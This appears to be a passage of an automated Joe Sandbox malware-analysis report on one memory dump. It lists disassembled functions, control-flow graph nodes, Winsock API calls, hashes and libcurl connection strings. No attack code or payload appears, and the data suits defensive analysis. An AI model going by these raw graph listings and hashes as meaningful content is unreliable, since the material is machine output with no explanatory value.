                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Sleep$Unothrow_t@std@@@__ehfuncinfo$??2@select
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1691268743-0
                                                                                                                                  • Opcode ID: a88f4f09adbb2f6151ba90d52ef15916c0021b563470ad1963238f1782358965
                                                                                                                                  • Instruction ID: 5c926475dc604d6beb03cb11f3f75c3f794dd9a7604ecc6e00d35d12fbb0aec3
                                                                                                                                  • Opcode Fuzzy Hash: a88f4f09adbb2f6151ba90d52ef15916c0021b563470ad1963238f1782358965
                                                                                                                                  • Instruction Fuzzy Hash: 06D1A570A0421D8BEB65CF29C8507AA73B9EF59714F1086EDE869D7290DF78CA80CB44
                                                                                                                                  Function 6B8F6EF0 Relevance: 12.5, APIs: 8, Instructions: 497COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 635 6b8f6ef0-6b8f6f1e 636 6b8f747b-6b8f748f call 6b91db71 635->636 637 6b8f6f24-6b8f6f2a 635->637 637->636 639 6b8f6f30-6b8f6f36 637->639 640 6b8f6f4b-6b8f6f51 639->640 641 6b8f6f38-6b8f6f4a call 6b91db71 639->641 644 6b8f6f69-6b8f6f71 640->644 645 6b8f6f53-6b8f6f68 call 6b91db71 640->645 648 6b8f6fcc-6b8f6fde call 6b8f9c30 644->648 649 6b8f6f73-6b8f6f89 call 6b8f8760 644->649 655 6b8f6fe8-6b8f6ffc 648->655 656 6b8f6fe0-6b8f6fe5 648->656 657 6b8f6f90-6b8f6f95 649->657 658 6b8f70e4-6b8f70f9 655->658 659 6b8f7002-6b8f700a 655->659 656->655 660 6b8f6f9c-6b8f6fa3 657->660 661 6b8f6f97-6b8f6f9b 657->661 665 6b8f70ff-6b8f710a 658->665 666 6b8f7203-6b8f7208 658->666 659->658 662 6b8f7010-6b8f7020 call 6b8f8760 659->662 663 6b8f6faa-6b8f6fad 660->663 664 6b8f6fa5-6b8f6fa9 660->664 661->660 686 6b8f7022-6b8f7037 662->686 667 6b8f6faf-6b8f6fb5 663->667 668 6b8f6fb7-6b8f6fc4 663->668 664->663 669 6b8f7110-6b8f7129 665->669 670 6b8f720e-6b8f7228 WSAWaitForMultipleEvents 666->670 671 6b8f73fc-6b8f7401 666->671 667->657 667->668 668->649 675 6b8f6fc6-6b8f6fc9 668->675 673 6b8f712b-6b8f712e 669->673 674 6b8f7132-6b8f7148 669->674 676 6b8f722e 670->676 677 6b8f72f1-6b8f72f8 670->677 678 6b8f7408-6b8f740c 671->678 679 6b8f7403-6b8f7406 671->679 673->674 681 6b8f714a-6b8f7155 674->681 682 6b8f7159-6b8f715c 674->682 675->648 683 6b8f7231-6b8f726b WSAEnumNetworkEvents 676->683 687 6b8f72fe-6b8f7306 677->687 688 6b8f73ed-6b8f73f9 WSAResetEvent 677->688 684 6b8f740e-6b8f7410 678->684 685 6b8f7452-6b8f7464 call 6b91db71 678->685 679->678 681->682 689 6b8f715e-6b8f7165 682->689 690 6b8f7169-6b8f717d call 6b8ffef0 682->690 691 6b8f726d-6b8f72b9 683->691 692 6b8f72c2-6b8f72e5 WSAEventSelect 683->692 684->685 694 6b8f7412-6b8f741b 684->694 695 6b8f7069 686->695 696 6b8f7039-6b8f703b 686->696 687->688 697 6b8f730c 687->697 688->671 689->690 718 6b8f717f-6b8f718b 690->718 719 6b8f71cb-6b8f71dc WSAEventSelect 690->719 691->692 700 6b8f72bb-6b8f72bf 691->700 692->683 702 6b8f72eb-6b8f72ee 692->702 694->685 703 6b8f741d-6b8f7423 694->703 698 6b8f706b-6b8f7078 695->698 704 6b8f703d-6b8f7049 call 6b9003a0 696->704 705 6b8f705b-6b8f7067 696->705 706 6b8f7310-6b8f7322 call 6b8f8760 697->706 708 6b8f707a-6b8f707c 698->708 709 6b8f70a6-6b8f70a9 698->709 700->692 711 6b8f72c1 700->711 702->677 703->685 712 6b8f7425-6b8f7434 call 6b8f9c30 703->712 714 6b8f704e-6b8f7058 704->714 705->698 725 6b8f7327-6b8f7331 706->725 716 6b8f709f-6b8f70a3 708->716 717 6b8f707e-6b8f708a call 6b9003a0 708->717 720 6b8f70ab-6b8f70be WSAEventSelect 709->720 721 6b8f70d1-6b8f70db 709->721 711->692 712->685 732 6b8f7436-6b8f743b 712->732 714->705 716->709 736 6b8f708f-6b8f709c 717->736 727 6b8f718d-6b8f7193 718->727 728 6b8f7196-6b8f71a1 718->728 723 6b8f7465-6b8f747a call 6b91db71 719->723 724 6b8f71e2-6b8f71f4 719->724 720->723 729 6b8f70c4-6b8f70cb 720->729 721->662 730 6b8f70e1 721->730 724->669 733 6b8f71fa-6b8f7200 724->733 734 6b8f73da-6b8f73e4 725->734 735 6b8f7337-6b8f735d WSAEnumNetworkEvents 725->735 727->728 738 6b8f71ac-6b8f71b5 728->738 739 6b8f71a3-6b8f71a9 728->739 729->686 729->721 730->658 732->685 740 6b8f743d-6b8f743f 732->740 733->666 734->706 743 6b8f73ea 734->743 741 6b8f735f-6b8f7361 735->741 742 6b8f736a-6b8f736c 735->742 736->716 745 6b8f71b7-6b8f71bd 738->745 746 6b8f71c0-6b8f71c8 738->746 739->738 747 6b8f7445 740->747 748 6b8f7441-6b8f7443 740->748 749 6b8f73b6-6b8f73d4 WSAEventSelect 741->749 750 6b8f7363-6b8f7365 741->750 742->749 751 6b8f736e-6b8f7370 742->751 743->688 745->746 746->719 752 6b8f7447-6b8f744f call 6b9004d0 747->752 748->747 748->752 749->725 749->734 750->742 753 6b8f7367 750->753 751->749 754 6b8f7372-6b8f7374 751->754 752->685 753->742 754->749 756 6b8f7376-6b8f7379 754->756 758 6b8f737b-6b8f738f call 6b9003a0 756->758 759 6b8f7391-6b8f7399 756->759 758->759 765 6b8f73b3 758->765 759->749 761 6b8f739b-6b8f73b1 call 6b9003a0 759->761 761->749 761->765 765->749
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2fcd29f128afd7dc6208c5102b42c3602cd0db76daccd7810685d76146b3a20f
                                                                                                                                  • Instruction ID: e5f7349f2cb89baaac90f76a089c742f17ae9e3f41e03f2bfa90a4bba6443abc
                                                                                                                                  • Opcode Fuzzy Hash: 2fcd29f128afd7dc6208c5102b42c3602cd0db76daccd7810685d76146b3a20f
                                                                                                                                  • Instruction Fuzzy Hash: 15027E79E002199FEF10CFA8C881BAEB7B9FF58350F504569E955EB291E739D802CB50
                                                                                                                                  Function 6B8D2D20 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 409COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 784 6b8d2d20-6b8d2d68 785 6b8d2d6a 784->785 786 6b8d2d80-6b8d2dc4 call 6b90e5d0 784->786 787 6b8d2d6d-6b8d2d7f call 6b91db71 785->787 792 6b8d2dc9-6b8d2dcc 786->792 793 6b8d2dc6 786->793 794 6b8d2dce-6b8d2dd1 792->794 795 6b8d2de1-6b8d2de8 792->795 793->792 796 6b8d2ddf 794->796 797 6b8d2dd3-6b8d2dd6 794->797 798 6b8d2dee-6b8d2e34 call 6b90e680 795->798 796->795 797->798 799 6b8d2dd8-6b8d2ddd 797->799 802 6b8d2e3a-6b8d2e3c 798->802 803 6b8d32c4-6b8d32d2 call 6b9005d0 798->803 799->795 802->803 805 6b8d2e42 802->805 809 6b8d32d7-6b8d32e7 call 6b91db71 803->809 807 6b8d2e4c-6b8d2e53 805->807 808 6b8d2e44-6b8d2e46 805->808 810 6b8d2e9a-6b8d2e9c 807->810 811 6b8d2e55-6b8d2e6f call 6b8d3f40 807->811 808->803 808->807 812 6b8d2ea0-6b8d2eb5 810->812 821 6b8d2e87-6b8d2e99 call 6b91db71 811->821 822 6b8d2e71-6b8d2e7a 811->822 815 6b8d2ebb-6b8d2ed4 call 6b9003a0 812->815 816 6b8d3120 812->816 831 6b8d2fcc-6b8d2fcf 815->831 832 6b8d2eda-6b8d2f28 call 6b90e680 815->832 820 6b8d3126-6b8d312a 816->820 820->812 826 6b8d3130-6b8d3132 820->826 822->821 823 6b8d2e7c-6b8d2e84 call 6b8d4060 822->823 823->821 827 6b8d32af 826->827 828 6b8d3138-6b8d313f 826->828 834 6b8d32b1-6b8d32c3 call 6b91db71 827->834 828->827 833 6b8d3145-6b8d314c 828->833 837 6b8d2ff9-6b8d3011 call 6b8d4740 831->837 838 6b8d2fd1-6b8d2fd7 831->838 848 6b8d2f2a-6b8d2f30 832->848 849 6b8d2f54-6b8d2f56 832->849 833->827 839 6b8d3152-6b8d3167 call 6b8d46a0 833->839 854 6b8d3185-6b8d31d4 837->854 855 6b8d3017 837->855 838->837 843 6b8d2fd9-6b8d2fdb 838->843 839->787 860 6b8d316d-6b8d3174 839->860 843->816 844 6b8d2fe1-6b8d2ff7 call 6b8d4740 843->844 844->855 856 6b8d2f3a-6b8d2f4f call 6b9006b0 848->856 857 6b8d2f32-6b8d2f38 848->857 852 6b8d301d-6b8d301f 849->852 853 6b8d2f5c-6b8d2f63 849->853 852->816 862 6b8d3025-6b8d3041 WSASetLastError 852->862 853->852 861 6b8d2f69-6b8d2fa6 call 6b90e680 853->861 863 6b8d31eb-6b8d31fe call 6b8d3f40 854->863 864 6b8d31d6-6b8d31e0 call 6b8d28e0 854->864 855->852 856->849 857->849 857->856 866 6b8d322a-6b8d3231 860->866 867 6b8d317a-6b8d3180 860->867 861->852 881 6b8d2fa8 861->881 862->816 869 6b8d3047-6b8d308e call 6b8e8450 call 6b90a0e0 call 6b9006b0 862->869 863->809 884 6b8d3204-6b8d3206 863->884 864->863 872 6b8d323b-6b8d3242 866->872 873 6b8d3233-6b8d3239 866->873 874 6b8d3252-6b8d3295 call 6b90a0e0 call 6b9005d0 867->874 901 6b8d309e-6b8d30ae call 6b91db90 869->901 902 6b8d3090-6b8d309c 869->902 879 6b8d324c 872->879 880 6b8d3244-6b8d324a 872->880 873->874 874->834 899 6b8d3297-6b8d32ae call 6b91db71 874->899 879->874 880->874 885 6b8d2faa-6b8d2fb0 881->885 886 6b8d2fb2-6b8d2fca call 6b8d46a0 881->886 884->809 889 6b8d320c-6b8d320f call 6b8d4060 884->889 885->852 885->886 886->852 894 6b8d3214-6b8d3229 call 6b91db71 889->894 906 6b8d30b3-6b8d30ca 901->906 902->906 908 6b8d30ec-6b8d3106 call 6b8d46a0 906->908 909 6b8d30cc-6b8d30d1 906->909 915 6b8d3118-6b8d311e 908->915 916 6b8d3108-6b8d3116 908->916 909->908 910 6b8d30d3-6b8d30da 909->910 912 6b8d30e0-6b8d30e3 910->912 912->908 914 6b8d30e5-6b8d30ea 912->914 914->908 914->912 915->820 916->816 916->915
                                                                                                                                  Strings
                                                                                                                                  • Connection time-out, xrefs: 6B8D32C4
                                                                                                                                  • After %I64dms connect time, move on!, xrefs: 6B8D2F3C
                                                                                                                                  • Failed to connect to %s port %ld: %s, xrefs: 6B8D327D
                                                                                                                                  • connect to %s port %ld failed: %s, xrefs: 6B8D3070
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: After %I64dms connect time, move on!$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                                  • API String ID: 0-184998888
                                                                                                                                  • Opcode ID: ada8208aff8a28491fd0e22a1728219d784a3a8e640fe1a5a388004d92907d0c
                                                                                                                                  • Instruction ID: 144e462b26fe86d34814f334647b24520a338b3e0a008a7c812270024a439969
                                                                                                                                  • Opcode Fuzzy Hash: ada8208aff8a28491fd0e22a1728219d784a3a8e640fe1a5a388004d92907d0c
                                                                                                                                  • Instruction Fuzzy Hash: D9F1D270E006189BDB219F38DC41BEAB3B5EF85319F0049DEE95DA7251DB39AE84CB50
                                                                                                                                  Function 6B9009F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138networkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 917 6b9009f0-6b900a4e 918 6b900a54-6b900a5f 917->918 919 6b900b1a-6b900b3c send 917->919 918->919 920 6b900a65-6b900a68 918->920 921 6b900ba5-6b900bb7 call 6b91db71 919->921 922 6b900b3e-6b900b4c WSAGetLastError 919->922 924 6b900a72-6b900a80 call 6b9003a0 920->924 925 6b900a6a-6b900a6c 920->925 926 6b900b69-6b900b9f call 6b90a0e0 call 6b9005d0 922->926 927 6b900b4e-6b900b68 call 6b91db71 922->927 932 6b900a85-6b900a8b 924->932 925->919 925->924 926->921 932->919 935 6b900a91-6b900a93 932->935 935->919 937 6b900a99-6b900a9d 935->937 939 6b900aeb 937->939 940 6b900a9f-6b900abc 937->940 941 6b900af1-6b900af3 939->941 946 6b900ad1-6b900aea call 6b91db71 940->946 947 6b900abe-6b900acf 940->947 942 6b900b13 941->942 943 6b900af5-6b900b0c recv 941->943 942->919 943->919 945 6b900b0e-6b900b11 943->945 945->919 947->941
                                                                                                                                  APIs
                                                                                                                                  • recv.WS2_32(?,?,?,00000000), ref: 6B900B04
                                                                                                                                  • send.WS2_32(?,?,?,00000000), ref: 6B900B2B
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B900B3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastrecvsend
                                                                                                                                  • String ID: Send failure: %s
                                                                                                                                  • API String ID: 3418755260-857917747
                                                                                                                                  • Opcode ID: 31e20452ddee766bd9d2968f0331ee43b1236cf68786baa121f47136b52c216a
                                                                                                                                  • Instruction ID: f0d24365b228dca41d212296940e7ac136390348647f567bd7f03f8db2001806
                                                                                                                                  • Opcode Fuzzy Hash: 31e20452ddee766bd9d2968f0331ee43b1236cf68786baa121f47136b52c216a
                                                                                                                                  • Instruction Fuzzy Hash: E251AD71A0421D9FDF24CF28CC41BA9B7F9AF15328F0042ADE969D7290CB74E991CB91
                                                                                                                                  Function 6B8D40C0 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 421networkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 6b8d40c0-6b8d4136 1 6b8d4138 0->1 2 6b8d413b-6b8d414f 0->2 1->2 3 6b8d4151-6b8d415b 2->3 4 6b8d4160-6b8d417a call 6b91f070 2->4 3->4 7 6b8d417c-6b8d41ad call 6b8f7550 * 2 4->7 8 6b8d41af-6b8d41c7 socket 4->8 9 6b8d41c9-6b8d41cc 7->9 8->9 12 6b8d4512 9->12 13 6b8d41d2-6b8d41d9 9->13 14 6b8d4517-6b8d4527 call 6b91db71 12->14 15 6b8d41db-6b8d41e3 call 6b8fa660 13->15 16 6b8d41e6-6b8d4210 call 6b8d2840 13->16 15->16 26 6b8d4267-6b8d4288 call 6b9006b0 16->26 27 6b8d4212-6b8d4266 call 6b921f49 * 2 call 6b90a0e0 call 6b9005d0 call 6b8d28e0 call 6b91db71 16->27 33 6b8d428f-6b8d4296 26->33 34 6b8d428a-6b8d428d 26->34 35 6b8d4298-6b8d42a6 33->35 36 6b8d4300 33->36 34->33 34->36 38 6b8d42a8-6b8d42d0 setsockopt 35->38 39 6b8d4307-6b8d432c 35->39 36->39 38->39 41 6b8d42d2-6b8d42fe WSAGetLastError call 6b90a0e0 call 6b9006b0 38->41 43 6b8d432e-6b8d433f call 6b914f30 39->43 44 6b8d4359-6b8d435c 39->44 41->39 62 6b8d434d-6b8d4357 43->62 63 6b8d4341-6b8d434b 43->63 48 6b8d435e-6b8d437f getsockopt 44->48 49 6b8d43a9-6b8d43b0 44->49 50 6b8d438f-6b8d43a3 setsockopt 48->50 51 6b8d4381-6b8d438d 48->51 52 6b8d43b6-6b8d43bd 49->52 53 6b8d4481-6b8d4488 49->53 50->49 51->49 51->50 52->53 59 6b8d43c3-6b8d43e6 setsockopt 52->59 57 6b8d448a-6b8d44bd call 6b8f7550 * 2 53->57 58 6b8d44c6-6b8d44cf 53->58 97 6b8d44bf 57->97 98 6b8d4528-6b8d452a 57->98 69 6b8d44d6-6b8d44fb call 6b8ef0a0 call 6b8d39a0 58->69 70 6b8d44d1-6b8d44d4 58->70 65 6b8d43fc-6b8d4469 call 6b9122a0 * 2 WSAIoctl 59->65 66 6b8d43e8-6b8d43f7 call 6b9006b0 59->66 62->48 63->49 65->53 93 6b8d446b-6b8d447e WSAGetLastError call 6b9006b0 65->93 66->53 75 6b8d454c-6b8d4574 call 6b8fa660 call 6b90e5d0 69->75 90 6b8d44fd-6b8d4510 call 6b8d28e0 69->90 70->69 70->75 95 6b8d4576-6b8d459e call 6b8f69d0 * 2 75->95 96 6b8d45a1-6b8d45a8 75->96 90->12 90->14 93->53 95->96 102 6b8d45ae-6b8d45b5 96->102 103 6b8d467b-6b8d4695 call 6b91db71 96->103 97->58 98->58 104 6b8d452c-6b8d454b call 6b8d28e0 call 6b91db71 98->104 102->103 107 6b8d45bb-6b8d45c2 102->107 111 6b8d4604-6b8d4613 WSAGetLastError 107->111 112 6b8d45c4-6b8d45db connect 107->112 115 6b8d4615-6b8d461a 111->115 116 6b8d4660-6b8d467a call 6b91db71 111->116 112->111 118 6b8d45dd-6b8d45e5 112->118 120 6b8d461c-6b8d4621 115->120 121 6b8d4623-6b8d465b call 6b90a0e0 call 6b9006b0 call 6b8d28e0 115->121 118->14 123 6b8d45eb-6b8d4603 call 6b91db71 118->123 120->116 120->121 121->12
                                                                                                                                  APIs
                                                                                                                                  • socket.WS2_32(?,?,?), ref: 6B8D41C1
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 6B8D42C8
                                                                                                                                  • WSAGetLastError.WS2_32(?,00000100), ref: 6B8D42DE
                                                                                                                                  • getsockopt.WS2_32(00000000,0000FFFF,00001001,00000000,00000004), ref: 6B8D4377
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00001001,00004020,00000004), ref: 6B8D43A3
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000000,00000004), ref: 6B8D43DE
                                                                                                                                  • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000004,00000000,00000000), ref: 6B8D4461
                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000007), ref: 6B8D446B
                                                                                                                                    • Part of subcall function 6B8FA660: ioctlsocket.WS2_32(00000000,8004667E,6B8D4554), ref: 6B8FA67A
                                                                                                                                    • Part of subcall function 6B90E5D0: QueryPerformanceCounter.KERNEL32(6B8FF03B,?,6B8D669E,6B8FF03B,?,?,?,?), ref: 6B90E5E5
                                                                                                                                    • Part of subcall function 6B90E5D0: __alldvrm.LIBCMT ref: 6B90E5FE
                                                                                                                                    • Part of subcall function 6B90E5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B90E627
                                                                                                                                  • connect.WS2_32(00000000,?,?), ref: 6B8D45D2
                                                                                                                                    • Part of subcall function 6B8F69D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8F6A0D
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D4604
                                                                                                                                  Strings
                                                                                                                                  • Trying %s:%ld..., xrefs: 6B8D4271
                                                                                                                                  • @, xrefs: 6B8D430C
                                                                                                                                  • Failed to set SO_KEEPALIVE on fd %d, xrefs: 6B8D43E9
                                                                                                                                  • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 6B8D4473
                                                                                                                                  • Immediate connect fail for %s: %s, xrefs: 6B8D463A
                                                                                                                                  • Could not set TCP_NODELAY: %s, xrefs: 6B8D42EB
                                                                                                                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 6B8D4235
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastsetsockopt$Unothrow_t@std@@@__ehfuncinfo$??2@$CounterIoctlPerformanceQuery__alldvrmconnectcurl_msnprintfcurl_mvsnprintfgetsockoptioctlsocketsocket
                                                                                                                                  • String ID: Trying %s:%ld...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                  • API String ID: 194311702-3868455274
                                                                                                                                  • Opcode ID: 984086e28aeed9a14f46dad4b99d3572c469b34810c2d6651b7f5e00390ddf11
                                                                                                                                  • Instruction ID: 982c8c1da1a1c60c53a308c77e3434650d1b6564d8f9ffd775e994d30a428304
                                                                                                                                  • Opcode Fuzzy Hash: 984086e28aeed9a14f46dad4b99d3572c469b34810c2d6651b7f5e00390ddf11
                                                                                                                                  • Instruction Fuzzy Hash: E8F1BF71940219ABEB20DF74CC8AFAEB7B9EF45308F1405E7E509A7191DB799E808F50
                                                                                                                                  Function 6B8E2EA0 Relevance: 23.6, APIs: 2, Strings: 11, Instructions: 800COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • anonymous, xrefs: 6B8E3013
                                                                                                                                  • No more connections allowed to host %s: %zu, xrefs: 6B8E36CD
                                                                                                                                  • No connections available in cache, xrefs: 6B8E3823
                                                                                                                                  • proxy, xrefs: 6B8E3613, 6B8E361B
                                                                                                                                  • NTLM picked AND auth done set, clear picked!, xrefs: 6B8E3782
                                                                                                                                  • Couldn't resolve host '%s', xrefs: 6B8E38EA
                                                                                                                                  • host, xrefs: 6B8E360D
                                                                                                                                  • Re-using existing connection! (#%ld) with %s %s, xrefs: 6B8E3622
                                                                                                                                  • No connections available., xrefs: 6B8E36DB
                                                                                                                                  • Couldn't resolve proxy '%s', xrefs: 6B8E397B
                                                                                                                                  • NTLM-proxy picked AND auth done set, clear picked!, xrefs: 6B8E37AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Couldn't resolve host '%s'$Couldn't resolve proxy '%s'$NTLM picked AND auth done set, clear picked!$NTLM-proxy picked AND auth done set, clear picked!$No connections available in cache$No connections available.$No more connections allowed to host %s: %zu$Re-using existing connection! (#%ld) with %s %s$anonymous$host$proxy
                                                                                                                                  • API String ID: 0-2910903954
                                                                                                                                  • Opcode ID: 907e5d249c05d55fb42a1a55e6e2f093ad6c615001a556c6f1fd0038b1254305
                                                                                                                                  • Instruction ID: 37f514d9d5d2fda9b0d1eb685eb0cfe2e3bf0d2b5b306dbf321e6bf4106dd49e
                                                                                                                                  • Opcode Fuzzy Hash: 907e5d249c05d55fb42a1a55e6e2f093ad6c615001a556c6f1fd0038b1254305
                                                                                                                                  • Instruction Fuzzy Hash: 8762D770A04746ABD726CF74C881BEBB7F4BF06308F00056DE86997251EB39AD55CBA1
                                                                                                                                  Function 6B8D9E30 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 139COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  • easy handle already used in multi handle, xrefs: 6B8D9E59
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: easy handle already used in multi handle
                                                                                                                                  • API String ID: 0-2284409743
                                                                                                                                  • Opcode ID: cbdea9f7fcbc22b0ece9dec74097b449664efa62bb03fa7bb096ebd8b547a1e0
                                                                                                                                  • Instruction ID: a4d124602c423e0733eeed809e59df6c71863c78e7efa87e9c406768e7d21d3c
                                                                                                                                  • Opcode Fuzzy Hash: cbdea9f7fcbc22b0ece9dec74097b449664efa62bb03fa7bb096ebd8b547a1e0
